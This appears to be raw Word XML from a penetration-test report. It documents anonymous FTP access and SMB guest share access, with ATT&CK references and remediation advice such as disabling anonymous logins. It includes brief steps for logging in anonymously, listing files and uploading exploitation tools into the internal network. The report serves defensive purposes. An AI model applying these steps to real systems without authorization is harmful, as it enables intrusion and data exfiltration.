      <w:r w:rsidRPr="0D325B6E" w:rsidR="00089F98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exfiltrate</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1191412D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sensitive data out of the internal </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="480A050B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>environment,</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1191412D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is harder to detect and prevent than other infiltration/exfiltration methods. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="76C09587" w14:textId="3AA30495">
      <w:pPr>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3C219125" w:rsidP="0D325B6E" w:rsidRDefault="3C219125" w14:paraId="6B234158" w14:textId="7A4939C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21912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3362F38" w:rsidP="0D325B6E" w:rsidRDefault="03362F38" w14:paraId="2FD9D142" w14:textId="12A50AA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362F38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1: Log into FTP server with anonymous username and any password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="03362F38" w:rsidP="0D325B6E" w:rsidRDefault="03362F38" w14:paraId="3921CF9C" w14:textId="27B5DE6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362F38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 2: Use the ls command to view data and files stored on the FTP server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="03362F38" w:rsidP="0D325B6E" w:rsidRDefault="03362F38" w14:paraId="35AB2836" w14:textId="5EA89DB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3362F38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Use put to transfer </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03362F38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03362F38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tools and scripts into the internal network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="060D9F2A" w14:textId="1EA44AC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C219125" w:rsidP="0D325B6E" w:rsidRDefault="3C219125" w14:paraId="74D08E06" w14:textId="31F0CB2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219125">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466C4D05" w:rsidP="0D325B6E" w:rsidRDefault="466C4D05" w14:paraId="78B7B657" w14:textId="5F4C5A0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66C4D0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66C4D0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DE45822" w:rsidP="0D325B6E" w:rsidRDefault="6DE45822" w14:paraId="560A665A" w14:textId="2DD6B555">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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6DE45822">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6DE45822">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">anonymous </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="18B8A5C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6DE45822">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">login </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3207B871">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if there is no explicit reason to require it</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="71EB6BC3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3207B871" w:rsidP="0D325B6E" w:rsidRDefault="3207B871" w14:paraId="07DBA5D1" w14:textId="45CAEE5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>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3207B871">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If anonymous FTP is </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3207B871">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3207B871">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, it is recommended that anonymous users do not have access to any sensitive information and files that should not be publicly accessible. It is also recommended to disallow anonymous users from being able to upload any files to the FTP server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="60520705" w14:textId="564783CD">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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3C219125" w:rsidP="0D325B6E" w:rsidRDefault="3C219125" w14:paraId="7FC7EB1A" w14:textId="4DE83B7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C21912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5E9A0C36" w:rsidP="0D325B6E" w:rsidRDefault="5E9A0C36" w14:paraId="586EE9C3" w14:textId="4DA84F07">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rdc1fcb1d93ac43ed">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="5E9A0C36">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>IBM - FTP Security</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="150C3E7A" w14:textId="3F7BBE7B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="14ABA9B3" w:rsidP="0D325B6E" w:rsidRDefault="14ABA9B3" w14:paraId="5BCB197A" w14:textId="141283DB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:beforeAutospacing="off" w:after="8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302237118" w:id="1137409413"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="14ABA9B3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80" w:themeShade="FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="14ABA9B3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc160041661" w:id="1909662007"/>
      <w:bookmarkStart w:name="_Toc649936385" w:id="724723520"/>
      <w:bookmarkStart w:name="_Toc964931007" w:id="536211022"/>
      <w:bookmarkStart w:name="_Toc1696294372" w:id="757722892"/>
      <w:bookmarkStart w:name="_Toc53686259" w:id="2140815846"/>
      <w:bookmarkStart w:name="_Toc1066798073" w:id="452761077"/>
      <w:bookmarkStart w:name="_Toc1281491665" w:id="997416357"/>
      <w:bookmarkStart w:name="_Toc2058574509" w:id="292736354"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="01540C5A">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="28D043F5">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMB Share Guest Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1909662007"/>
      <w:bookmarkEnd w:id="724723520"/>
      <w:bookmarkEnd w:id="536211022"/>
      <w:bookmarkEnd w:id="757722892"/>
      <w:bookmarkEnd w:id="2140815846"/>
      <w:bookmarkEnd w:id="452761077"/>
      <w:bookmarkEnd w:id="997416357"/>
      <w:bookmarkEnd w:id="292736354"/>
      <w:bookmarkEnd w:id="113740941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3BC031BD">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6CFA026" w14:textId="516072A0">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C64990F" w14:textId="1EE14A4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F5EA221" w14:textId="7009F95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23945BFD">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B5C170" w14:textId="22770AF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415CC056" w14:textId="0A31B94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297AE56" w14:textId="20895FB9">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7B06346E" w14:textId="3DB5A25F">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2FBD8FF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A5D470" w14:textId="4BFCE60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A6D6929" w14:textId="68B81829">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061179D9"/>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F3B3117"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="48290102">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C2B861" w14:textId="7DDDE3C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CADBABE" w14:textId="5D8FA487">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59A0A6DA">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68D95ED" w14:textId="636EF14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D3EB065" w14:textId="42508FF4">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94AE5CC" w:rsidP="0D325B6E" w:rsidRDefault="694AE5CC" w14:paraId="259B3BC9" w14:textId="3197A217">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R2bfca42c3e7c481b">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="694AE5CC">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>T1021.002: Remote Services: SMB/Windows Admin Shares</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4BEB9F47" w14:textId="084DAA33">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R12d8d15a2d174c58">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>T1</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>105</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="17342211">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A70D991"/>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95D77FE" w14:textId="17DB94B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AB21F76" w14:textId="2B79902A">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R09d6a93a7dae4a09">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>M1022</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve"> Restrict File and Directory Permissions</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7015FAE9" w14:textId="315F3AB1">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R2dfe4f98602a4974">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>M1035</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:t xml:space="preserve"> Limit Access to Resource Over Network</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3A7A07D7">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B722DBD" w14:textId="0088E282">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EEAF5D2" w14:textId="283F5719">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="59CB0F58" w14:textId="74CC4DAD">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1540C5A" w:rsidP="0D325B6E" w:rsidRDefault="01540C5A" w14:paraId="7D3C8D80" w14:textId="7794E9B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C9044D9" w:rsidP="0D325B6E" w:rsidRDefault="4C9044D9" w14:paraId="04A0193B" w14:textId="61E757DA">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C9044D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Guest SMB Access</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is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permitted</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on the internal </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="40B57D4E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMB</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server.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This allows a</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2DDC08B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ny unauthenticated user on the network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D325B6E" w:rsidR="792222BB">
